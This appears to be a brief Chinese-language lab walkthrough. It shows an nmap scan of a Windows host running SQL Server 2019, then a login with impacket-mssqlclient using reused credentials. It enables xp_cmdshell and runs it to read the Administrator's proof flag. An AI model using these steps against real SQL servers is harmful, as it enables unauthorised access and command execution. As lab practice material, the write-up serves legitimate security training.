命令:nmap -A -Pn 192.168.243.141
Nmap initial output
Nmap scan report for 192.168.243.141
Host is up (0.21s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
**1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM**
| ms-sql-ntlm-info:
| Target_Name: SQL27
| NetBIOS_Domain_Name: SQL27
| NetBIOS_Computer_Name: SQL27
| DNS_Domain_Name: sql27
| DNS_Computer_Name: sql27
|_ Product_Version: 10.0.17763
|_ssl-date: 2022-07-15T04:52:30+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-07-15T04:51:04
|_Not valid after: 2052-07-15T04:51:04
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SQL27
| NetBIOS_Domain_Name: SQL27
| NetBIOS_Computer_Name: SQL27
| DNS_Domain_Name: sql27
| DNS_Computer_Name: **sql27**
| Product_Version: 10.0.17763
|_ System_Time: 2022-07-15T04:52:23+00:00
|_ssl-date: 2022-07-15T04:52:29+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sql27
| Not valid before: 2022-04-06T09:59:50
|_Not valid after: 2022-10-06T09:59:50
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 192.168.243.141:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 209.18 ms 192.168.49.1
2 204.01 ms 192.168.243.141
根据192.168.243.140的操作,继续192.168.243.141:
impacket-mssqlclient 'crack123:P@ssw0rd!'@192.168.243.141
发现xp_cmdshell没有开启,因为是sysadmin,先开启xp_cmdshell:
SQL> enable_xp_cmdshell
SQL> xp_cmdshell "type c:\\Users\\Administrator\\Desktop\\proof.txt"
得到第二个flag:43ee2d2866e4e2180b3ea72d9d10bce6